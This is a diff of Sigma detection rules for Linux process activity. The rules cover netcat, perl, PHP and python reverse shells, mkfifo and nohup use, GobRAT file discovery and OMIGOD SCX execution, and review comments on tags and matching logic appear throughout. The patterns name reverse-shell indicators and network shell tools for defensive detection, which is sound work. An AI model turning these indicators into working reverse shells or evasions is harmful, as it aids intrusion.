+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
+author: Ömer Günal, Alejandro Ortuno, oscd.community
 date: 2020/10/11
-modified: 2021/11/27
+modified: 2022/11/27
+tags:
+ - attack.discovery
+ - attack.t1069.001
 logsource:
- category: process_creation
- product: linux
+ category: process_creation
+ product: linux
 detection:
- selection_1:
- Image|endswith: '/groups'
- selection_2:
- Image|endswith: '/cat'
- CommandLine|contains: '/etc/group'
- condition: 1 of selection*
+ selection_1:
+ Image|endswith: '/groups'
+ selection_2:
+ Image|endswith:
+ - '/cat'
+ - '/head'
+ - '/tail'
+ - '/more'
+ CommandLine|contains: '/etc/group'
+ condition: 1 of selection*
 falsepositives:
- - Legitimate administration activities
+ - Legitimate administration activities
 level: low
-tags:
- - attack.discovery
- - attack.t1069.001
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml
new file mode 100644
index 000000000..5b618f296
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml
@@ -0,0 +1,28 @@
+title: Potential GobRAT File Discovery Via Grep
+id: e34cfa0c-0a50-4210-9cb3-5632d08eb041
+status: experimental
+description: Detects the use of grep to discover specific files created by the GobRAT malware
+references:
+ - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
+ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
+ - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
+author: Joseliyo Sanchez, @Joseliyo_Jstnk
+date: 2023/06/02
+tags:
+ - attack.discovery
+ - attack.t1082
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/grep'
+ CommandLine|contains:
+ - 'apached'
+ - 'frpc'
+ - 'sshd.sh'
+ - 'zone.arm'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml
new file mode 100644
index 000000000..d60f1cb6e
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml
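Review bot: `level: high` with `falsepositives: Unknown` is aggressive for a plain `grep` substring match on `'frpc'`, which is the client binary name of the widely deployed frp reverse-proxy project and will be grepped for by its legitimate operators; `'apached'` is also a plausible typo of `apache` in an interactive shell. Adding `- Administrators of hosts that legitimately run frp` under falsepositives, or lowering the level unless two of the four strings co-occur, would make the rating defensible while keeping the GobRAT-specific `'sshd.sh'` and `'zone.arm'` indicators.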
@@ -0,0 +1,21 @@
+title: Named Pipe Created Via Mkfifo
+id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4
+status: experimental
+description: Detects the creation of a new named pipe using the "mkfifo" utility
+references:
+ - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk
+ - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/06/16
+tags:
+ - attack.execution
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/mkfifo'
+ condition: selection
+falsepositives:
+ - Unknown
+level: low
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml
new file mode 100644
index 000000000..4f773c3d9
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml
@@ -0,0 +1,26 @@
+title: Potentially Suspicious Named Pipe Created Via Mkfifo
+id: 999c3b12-0a8c-40b6-8e13-dd7d62b75c7a
+related:
+ - id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4
+ type: derived
+status: experimental
+description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
+references:
+ - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk
+ - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/06/16
+tags:
+ - attack.execution
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/mkfifo'
+ # Note: Add more potentially suspicious locations
+ CommandLine|contains: ' /tmp/'
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
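Review bot: The `# Note: Add more potentially suspicious locations` comment in the susp_location rule leaves the selection with the single substring `' /tmp/'`, so pipes created under the other world-writable directories that serve the same purpose, `/var/tmp/` and `/dev/shm/`, are not covered; the note should either be resolved or state the gap explicitly. A list such as `CommandLine|contains: [' /tmp/', ' /var/tmp/', ' /dev/shm/']` keeps the leading-space anchor already used here. The same single-location pattern appears in the `proc_creation_lnx_nohup_susp_execution.yml` hunk later in this commit, which additionally uses `'/tmp/'` without the leading space, so the two derived rules do not match the same set of paths; aligning them makes their behaviour comparable.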
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml
new file mode 100644
index 000000000..2629345c5
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml
@@ -0,0 +1,26 @@
+title: Mount Execution With Hidepid Parameter
+id: ec52985a-d024-41e3-8ff6-14169039a0b3
+status: test
+description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
+references:
+ - https://blogs.blackberry.com/
+ - https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/
+ - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
+author: Joseliyo Sanchez, @Joseliyo_Jstnk
+date: 2023/01/12
+tags:
+ - attack.credential_access
+ - attack.t1564
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection:
+ Image|endswith: '/mount'
+ CommandLine|contains|all:
+ - 'hidepid=2'
+ - ' -o '
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml
new file mode 100644
index 000000000..2e43b72af
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml
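Review bot: The `attack.credential_access` tag is inconsistent with `attack.t1564`: T1564 (Hide Artifacts) belongs to the Defense Evasion tactic, and hiding processes from other users is evasion rather than credential theft, so the tag should be `- attack.defense_evasion`. The first reference, `https://blogs.blackberry.com/`, is a bare site root that does not lead a reader to the research behind the rule; replace it with the specific article URL or drop it.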
@@ -0,0 +1,59 @@
+title: Potential Netcat Reverse Shell Execution
+id: 7f734ed0-4f47-46c0-837f-6ee62505abd9
+status: test
+description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
+references:
+ - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+ - https://www.revshells.com/
+ - https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
+ - https://www.infosecademy.com/netcat-reverse-shells/
+ - https://man7.org/linux/man-pages/man1/ncat.1.html
+author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
+date: 2023/04/07
+tags:
+ - attack.execution
+ - attack.t1059
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_nc:
+ Image|endswith:
+ - '/nc'
+ - '/ncat'
+ selection_flags:
+ CommandLine|contains:
+ - ' -c '
+ - ' -e '
+ selection_shell:
+ CommandLine|contains:
+ - ' ash'
+ - ' bash'
+ - ' bsh'
+ - ' csh'
+ - ' ksh'
+ - ' pdksh'
+ - ' sh'
+ - ' tcsh'
+ - '/bin/ash'
+ - '/bin/bash'
+ - '/bin/bsh'
+ - '/bin/csh'
+ - '/bin/ksh'
+ - '/bin/pdksh'
+ - '/bin/sh'
+ - '/bin/tcsh'
+ - '/bin/zsh'
+ - '$IFSash'
+ - '$IFSbash'
+ - '$IFSbsh'
+ - '$IFScsh'
+ - '$IFSksh'
+ - '$IFSpdksh'
+ - '$IFSsh'
+ - '$IFStcsh'
+ - '$IFSzsh'
+ condition: all of selection_*
+falsepositives:
+ - Unlikely
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml
deleted file mode 100644
index dff9dc956..000000000
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml
+++ /dev/null
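Review bot: The description only mentions the `-e` flag, but `selection_flags` also matches `' -c '`, so the text no longer describes what the rule fires on; suggested wording: `Detects execution of netcat with the "-e" or "-c" flag followed by common shells. This could be a sign of a potential reverse shell setup.` Note also that `' sh'` in `selection_shell` is a prefix match on any argument beginning with `sh` (for example ` show`), so it is wider than the other anchored entries; with the image and flag selections also required this is probably acceptable at `level: high`, but `falsepositives: - Unlikely` should mention that trade-off.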
@@ -1,31 +0,0 @@
-title: Linux Network Service Scanning
-id: 3e102cd9-a70d-4a7a-9508-403963092f31
-status: experimental
-description: Detects enumeration of local or remote network services.
-author: Alejandro Ortuno, oscd.community
-date: 2020/10/21
-modified: 2021/09/14
-references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md
-tags:
- - attack.discovery
- - attack.t1046
-logsource:
- category: process_creation
- product: linux
- definition: 'Detect netcat and filter our listening mode'
-detection:
- netcat:
- Image|endswith:
- - '/nc'
- - '/netcat'
- network_scanning_tools:
- Image|endswith:
- - '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection. consider fine tuning
- - '/nmap'
- netcat_listen_flag:
- CommandLine|contains: 'l'
- condition: (netcat and not netcat_listen_flag) or network_scanning_tools
-falsepositives:
- - Legitimate administration activities
-level: low
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup.yml
index 1b8abaea7..dedce2fb1 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup.yml
@@ -1,20 +1,23 @@
 title: Nohup Execution
 id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2
-status: experimental
+status: test
 description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
-author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'
 references:
- - https://gtfobins.github.io/gtfobins/nohup/
- - https://en.wikipedia.org/wiki/Nohup
- - https://www.computerhope.com/unix/unohup.htm
+ - https://gtfobins.github.io/gtfobins/nohup/
+ - https://en.wikipedia.org/wiki/Nohup
+ - https://www.computerhope.com/unix/unohup.htm
+author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'
 date: 2022/06/06
+tags:
+ - attack.execution
+ - attack.t1059.004
 logsource:
- product: linux
- category: process_creation
+ product: linux
+ category: process_creation
 detection:
- selection:
- Image|endswith: '/nohup'
- condition: selection
+ selection:
+ Image|endswith: '/nohup'
+ condition: selection
 falsepositives:
- - Administrators or installed processes that leverage nohup
+ - Administrators or installed processes that leverage nohup
 level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml
new file mode 100644
index 000000000..5359bdca9
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml
@@ -0,0 +1,27 @@
+title: Suspicious Nohup Execution
+id: 457df417-8b9d-4912-85f3-9dbda39c3645
+related:
+ - id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2
+ type: derived
+status: experimental
+description: Detects execution of binaries located in potentially suspicious locations via "nohup"
+references:
+ - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
+ - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
+ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
+ - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
+author: Joseliyo Sanchez, @Joseliyo_Jstnk
+date: 2023/06/02
+tags:
+ - attack.execution
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection:
+ Image|endswith: '/nohup'
+ CommandLine|contains: '/tmp/'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml
index 90ed0cf16..7711f5db5 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml
@@ -1,9 +1,18 @@
 title: OMIGOD SCX RunAsProvider ExecuteScript
 id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db
-status: experimental
-description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
-date: 2021/10/15
+status: test
+description: |
+ Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.
+ Script being executed gets created as a temp file in /tmp folder with a scx* prefix.
+ Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.
+ The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
+ Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
+references:
+ - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
+ - https://github.com/Azure/Azure-Sentinel/pull/3059
 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+date: 2021/10/15
+modified: 2022/10/05
 tags:
 - attack.privilege_escalation
 - attack.initial_access
@@ -11,17 +20,13 @@ tags:
 - attack.t1068
 - attack.t1190
 - attack.t1203
-references:
- - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- - https://github.com/Azure/Azure-Sentinel/pull/3059
- - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml
 logsource:
- product: linux
- category: process_creation
+ product: linux
+ category: process_creation
 detection:
 selection:
 User: root
- LogonId: '0'
+ LogonId: 0
 CurrentDirectory: '/var/opt/microsoft/scx/tmp'
 CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx'
 condition: selection
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml
index 50d18a1dd..5dbd85298 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml
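Review bot: Changing `LogonId: '0'` to `LogonId: 0` turns the value from a YAML string into an integer, and Sigma backends translate the two differently (string equality versus a numeric comparison), so if the log pipeline delivers `LogonId` as the string `"0"` the converted query may stop matching; this should be verified against the target backend's field mapping before it lands. The same edit is made in the `proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml` hunk that follows. If the intent was only a formatting cleanup, keeping `LogonId: '0'` is the safe choice; otherwise a comment such as `# LogonId is numeric in the source telemetry` would record why the type was changed.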
@@ -1,9 +1,16 @@
 title: OMIGOD SCX RunAsProvider ExecuteShellCommand
 id: 21541900-27a9-4454-9c4c-3f0a4240344a
-status: experimental
-description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
-date: 2021/10/15
+status: test
+description: |
+ Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.
+ SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including
+ Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
+references:
+ - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
+ - https://github.com/Azure/Azure-Sentinel/pull/3059
 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+date: 2021/10/15
+modified: 2022/10/05
 tags:
 - attack.privilege_escalation
 - attack.initial_access
@@ -11,17 +18,13 @@ tags:
 - attack.t1068
 - attack.t1190
 - attack.t1203
-references:
- - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- - https://github.com/Azure/Azure-Sentinel/pull/3059
- - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml
 logsource:
- product: linux
- category: process_creation
+ product: linux
+ category: process_creation
 detection:
 selection:
 User: root
- LogonId: '0'
+ LogonId: 0
 CurrentDirectory: '/var/opt/microsoft/scx/tmp'
 CommandLine|contains: '/bin/sh'
 condition: selection
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml
new file mode 100644
index 000000000..54d39c730
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml
@@ -0,0 +1,31 @@
+title: Potential Perl Reverse Shell Execution
+id: 259df6bc-003f-4306-9f54-4ff1a08fa38e
+status: test
+description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
+references:
+ - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+ - https://www.revshells.com/
+author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
+date: 2023/04/07
+tags:
+ - attack.execution
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_img:
+ Image|endswith: '/perl'
+ CommandLine|contains: ' -e '
+ selection_content:
+ - CommandLine|contains|all:
+ - 'fdopen('
+ - '::Socket::INET'
+ - CommandLine|contains|all:
+ - 'Socket'
+ - 'connect'
+ - 'open'
+ - 'exec'
+ condition: all of selection_*
+falsepositives:
+ - Unlikely
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml
new file mode 100644
index 000000000..4dc456108
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml
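Review bot: `Image|endswith: '/perl'` only matches an image path that ends in exactly `/perl`, while distributions also install versioned interpreter binaries next to the `perl` symlink, so which path shows up in process-creation telemetry depends on whether the agent reports the symlink or the resolved binary; the python rule in this same commit handles the analogous case with an `Image|contains` alternative. Consider `Image|contains: '/perl'` or an `Image|endswith` list, and record the assumption with a comment such as `# Assumes the agent reports the unversioned perl path; add versioned names if telemetry shows them`.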
@@ -0,0 +1,36 @@
+title: Potential PHP Reverse Shell
+id: c6714a24-d7d5-4283-a36b-3ffd091d5f7e
+status: test
+description: |
+ Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
+ Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
+references:
+ - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+ - https://www.revshells.com/
+author: '@d4ns4n_'
+date: 2023/04/07
+tags:
+ - attack.execution
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|contains: '/php'
+ CommandLine|contains|all:
+ - ' -r '
+ - 'fsockopen'
+ CommandLine|contains:
+ - 'ash'
+ - 'bash'
+ - 'bsh'
+ - 'csh'
+ - 'ksh'
+ - 'pdksh'
+ - 'sh'
+ - 'tcsh'
+ - 'zsh'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml
index 3dd32ec70..f61dbffc9 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml
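Review bot: The second `CommandLine|contains` list is redundant as written: every entry from `'ash'` to `'zsh'` contains the substring `'sh'`, which is itself an entry, so the whole list is equivalent to the single value `'sh'`, and that substring also matches unrelated text such as `shell_exec` or `flush`. Either the entries were meant to carry anchors the way the netcat rule in this commit does (`' sh'`, `'/bin/sh'`), or the list should be reduced to the one entry it collapses to; the anchored form is the more useful detection and should be preferred.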
@@ -1,24 +1,26 @@
 title: Process Discovery
 id: 4e2f5868-08d4-413d-899f-dc2f1508627b
 status: stable
-description: Detects process discovery commands
+description: |
+ Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.
+ Information obtained could be used to gain an understanding of common software/applications running on systems within the network
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md
 author: Ömer Günal, oscd.community
 date: 2020/10/06
-modified: 2021/08/14
-references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md
+modified: 2022/07/07
+tags:
+ - attack.discovery
+ - attack.t1057
 logsource:
 product: linux
 category: process_creation
 detection:
 selection:
 Image|endswith:
- - '/ps'
- - '/top'
+ - '/ps'
+ - '/top'
 condition: selection
 falsepositives:
 - Legitimate administration activities
 level: informational
-tags:
- - attack.discovery
- - attack.t1057
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml
new file mode 100644
index 000000000..767070986
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml
@@ -0,0 +1,24 @@
+title: Connection Proxy
+id: 72f4ab3f-787d-495d-a55d-68c2ff46cf4c
+status: test
+description: Detects setting proxy configuration
+references:
+ - https://attack.mitre.org/techniques/T1090/
+author: Ömer Günal
+date: 2020/06/17
+modified: 2022/10/05
+tags:
+ - attack.defense_evasion
+ - attack.t1090
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection:
+ CommandLine|contains:
+ - 'http_proxy='
+ - 'https_proxy='
+ condition: selection
+falsepositives:
+ - Legitimate administration activities
+level: low
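Review bot: In the proxy_connection rule, `attack.defense_evasion` does not match `attack.t1090`: T1090 (Proxy) is a Command and Control technique, and the rule's own reference `https://attack.mitre.org/techniques/T1090/` lists it under that tactic, so the tag should be `- attack.command_and_control`. The description `Detects setting proxy configuration` is also narrower than the selection, which fires on any command line containing `http_proxy=` or `https_proxy=` (including reads of the variable); `Detects command lines that set or reference the http_proxy/https_proxy environment variables` describes the behaviour more accurately.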
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml
index b56b56825..add5b3a11 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml
@@ -1,11 +1,15 @@
 title: Python Spawning Pretty TTY
 id: c4042d54-110d-45dd-a0e1-05c47822c937
+related:
+ - id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
+ type: similar
 status: experimental
-description: Detects python spawning a pretty tty
-author: Nextron Systems
-date: 2022/06/03
+description: Detects python spawning a pretty tty which could be indicative of potential reverse shell activity
 references:
 - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
+author: Nextron Systems
+date: 2022/06/03
+modified: 2023/06/16
 tags:
 - attack.execution
 - attack.t1059
@@ -13,17 +17,21 @@ logsource:
 category: process_creation
 product: linux
 detection:
- selection_image:
- Image|contains:
- - '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink
- - '/python3.'
- selection_cli1:
+ selection_img:
+ - Image|endswith:
+ - '/python'
+ - '/python2'
+ - '/python3'
+ - Image|contains:
+ - '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink
+ - '/python3.'
+ selection_cli_1:
 CommandLine|contains|all:
 - 'import pty'
 - '.spawn('
- selection_cli2:
+ selection_cli_2:
 CommandLine|contains: 'from pty import spawn'
- condition: selection_image and 1 of selection_cli*
+ condition: selection_img and 1 of selection_cli_*
 falsepositives:
 - Unknown
 level: high
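Review bot: The comment `# python image is always of the form ../python3.10; ../python is just a symlink` is now contradicted by the new `Image|endswith` alternative a few lines above it, which deliberately matches `/python`, `/python2` and `/python3`; a reader will not know which statement to trust. Replace it with a comment that explains why both forms are kept, e.g. `# Some agents report the symlink (/python3), others the resolved binary (/python3.10); match both`. The second hunk begins inside `logsource:`, so the rule header it belongs to is only partly visible here.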
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml
new file mode 100644
index 000000000..b138ebc9e
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml
@@ -0,0 +1,30 @@
+title: Potential Python Reverse Shell
+id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
+related:
+ - id: c4042d54-110d-45dd-a0e1-05c47822c937
+ type: similar
+status: test
+description: Detects executing python with keywords related to network activity that could indicate a potential reverse shell
+references:
+ - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+ - https://www.revshells.com/
+author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
+date: 2023/04/24
+tags:
+ - attack.execution
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|contains: 'python'
+ CommandLine|contains|all:
+ - ' -c '
+ - 'import'
+ - 'pty'
+ - 'spawn('
+ - '.connect'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml
new file mode 100644
index 000000000..27c08b20d
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml
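Review bot: `Image|contains: 'python'` has no path anchor, so it matches any image whose full path merely contains the word (for example a binary under a directory named after python), whereas the related pty_spawn rule in this commit anchors on `'/python'`; `Image|contains: '/python'` is tighter at no cost and keeps the two `related` rules consistent. The `'import'` and `'pty'` entries in `CommandLine|contains|all` are very short substrings, so the rule effectively relies on `'spawn('` and `'.connect'` for precision; a comment noting that would help the next maintainer judge the `level: high`.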
@@ -0,0 +1,30 @@
+title: Remote Access Tool - Team Viewer Session Started On Linux Host
+id: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d
+related:
+ - id: ab70c354-d9ac-4e11-bbb6-ec8e3b153357
+ type: similar
+ - id: f459ccb4-9805-41ea-b5b2-55e279e2424a
+ type: similar
+status: experimental
+description: |
+ Detects the command line executed when TeamViewer starts a session started by a remote host.
+ Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+references:
+ - Internal Research
+author: Josh Nickels, Qi Nan
+date: 2024/03/11
+tags:
+ - attack.initial_access
+ - attack.t1133
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ ParentImage|endswith: '/TeamViewer_Service'
+ Image|endswith: '/TeamViewer_Desktop'
+ CommandLine|endswith: '/TeamViewer_Desktop --IPCport 5939 --Module 1'
+ condition: selection
+falsepositives:
+ - Legitimate usage of TeamViewer
+level: low
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml
index c54f9d6f2..9faab9fe4 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml
